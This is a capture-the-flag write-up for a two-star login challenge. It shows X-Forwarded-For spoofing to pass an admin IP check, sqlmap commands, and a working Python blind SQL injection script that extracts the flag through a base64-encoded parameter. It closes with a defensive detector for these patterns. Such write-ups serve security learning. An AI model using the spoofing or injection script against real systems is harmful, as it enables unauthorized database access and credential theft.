Challenge environment:
Challenge difficulty: ★★
Challenge description: Could Q's system have a vulnerability?
There is a login form, so capture the login request with Burp Suite.
Burp Suite capture
Credentials entered: username admin, password 1
Send the request to Repeater and replay it
Click Send to forward the request
Response: Your IP is not the administrator's IP address!
Add the administrator's IP with a request header:
X-Forwarded-For: 127.0.0.1
An encoded string appears in the request:
dXNlcjphZG1pbnxwYXNzOjE%3D
From experience it is easy to recognise base64; the trailing %3D is a URL-encoded "=", so decode that first.
Decode the string: echo "dXNlcjphZG1pbnxwYXNzOjE=" | base64 -d
Output: user:admin|pass:1
The submitted username and password are base64-encoded (encoded, not encrypted).
Guess that this challenge involves SQL injection.
Try a one-shot run with sqlmap.
Using sqlmap
Copy the captured request into a text file.
Note: use the request that includes the X-Forwarded-For header.
Here I created a text file named flag.txt
and pasted the request into it.
One-shot with sqlmap -l: sqlmap -l flag.txt --batch --dbs
-l parse targets from a Burp or WebScarab proxy log
--batch fully automatic mode, i.e. answer yes to every prompt
--dbs list all databases
Run this command in a root terminal! sqlmap -r /home/kali/桌面/flag.txt -D sql --dump
-r load the HTTP request from a file (a locally saved request .txt)
-D select which database to use
-T select which table to use
-C select which column to use
--dbs list all databases
--batch automatically answer yes
--tables list the tables in the current database
--columns list the columns in the current table
--dump dump the data in the selected fields
At this point I suspect the challenge was changed:
sqlmap used to extract the data,
but now it no longer does.
Use a Python blind-injection script to brute-force the flag instead.
# Script by another player (St1ck4r)
```python
'''
# @Author: St1ck4r
# @Date: 2022-11-16 09:12:20
# @LastEditors: St1ck4r
# @LastEditTime: 2022-11-17 10:36:03
# @link: https://www.st1ck4r.top
'''
import requests
import base64

url = "{此处填写url地址}/check.php?data="
flag = ""
data = ""
# The login only works when the request claims to come from the admin's IP
header = {"X-Forwarded-For": "127.0.0.1"}
# payload = "(select group_concat(table_name) from information_schema.`TABLES` where table_schema = database())"
# payload = "(select group_concat(column_name) from information_schema.`COLUMNS` where table_name='user')"
payload = "(select group_concat(password) from user where username=\"flag\")"

# Boolean-based blind injection: binary-search the ASCII value of each character
for i in range(100):
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:
        # Credentials are sent as base64("user:...|pass:...") in the data parameter
        data = "user:admin' and ascii(substr({},{},1))<{} -- |pass:admin".format(payload, str(i + 1), str(mid))
        data = base64.b64encode(data.encode()).decode()
        new_url = url + data
        # print(new_url)
        res = requests.get(new_url, headers=header)
        # "Login succeeded! But even so I won't give you the Flag" means the condition was true
        if "登陆成功!但是你登陆成功我也不会给你Flag" in res.text:
            high = mid
        else:
            low = mid + 1
        mid = (low + high) // 2
    # Out of the printable range means the end of the string was reached
    if mid <= 32 or mid >= 127:
        break
    flag += chr(mid - 1)
# print(flag)
print(flag)
```
Flag obtained: **qsnctf{b487c107-4130-466b-acd7-7c6484729eb4}**
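From the defender's side, the two weaknesses used above (a client-controlled X-Forwarded-For header and an injection hidden inside a base64-encoded `data` parameter) are easy to miss because a filter that only inspects the raw query string never sees the SQL. The following is an added example, not part of the original writeup, that decodes `check.php` requests and flags the markers of this attack; the request paths and header values are constructed samples.

```python
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

# Markers of the boolean-based blind injection used against check.php.
SQLI_PATTERNS = {
    "quote-boolean": re.compile(r"'\s*(and|or)\b", re.I),   # quote then boolean operator
    "char-extraction": re.compile(r"ascii\s*\(\s*substr", re.I),  # one character at a time
    "schema-enum": re.compile(r"information_schema", re.I),  # table/column enumeration
    "sql-comment": re.compile(r"(--\s|#|/\*)"),             # comment cuts off the real query
}

def decode_data_param(path):
    """Decode the ?data= value (URL-encoded base64 of 'user:...|pass:...').
    Returns the plaintext string, or None if the parameter is absent or invalid."""
    for pair in urlsplit(path).query.split("&"):
        key, _, value = pair.partition("=")
        if key != "data":
            continue
        # unquote, not unquote_plus: '+' is part of the base64 alphabet
        try:
            return base64.b64decode(unquote(value), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            return None
    return None

def analyze_request(path, xff):
    """Return finding labels for one request; xff is the X-Forwarded-For header or None."""
    findings = []
    creds = decode_data_param(path)
    if creds is not None:
        for label, pattern in SQLI_PATTERNS.items():
            if pattern.search(creds):
                findings.append("sqli:" + label)
    # X-Forwarded-For is client-controlled: a loopback claim arriving from an
    # external client is the admin-IP bypass, and the header should only be
    # honoured when set by a trusted proxy.
    if xff and xff.split(",")[0].strip() in ("127.0.0.1", "::1"):
        findings.append("xff-loopback-claim")
    return findings

# Constructed sample traffic: the writeup's normal login, then one blind probe.
SAMPLE_REQUESTS = [
    ("/check.php?data=dXNlcjphZG1pbnxwYXNzOjE%3D", None),
    ("/check.php?data=" + base64.b64encode(
        b"user:admin' and ascii(substr(database(),1,1))<80 -- |pass:admin").decode(),
     "127.0.0.1"),
]

if __name__ == "__main__":
    for path, xff in SAMPLE_REQUESTS:
        print(decode_data_param(path), analyze_request(path, xff))
```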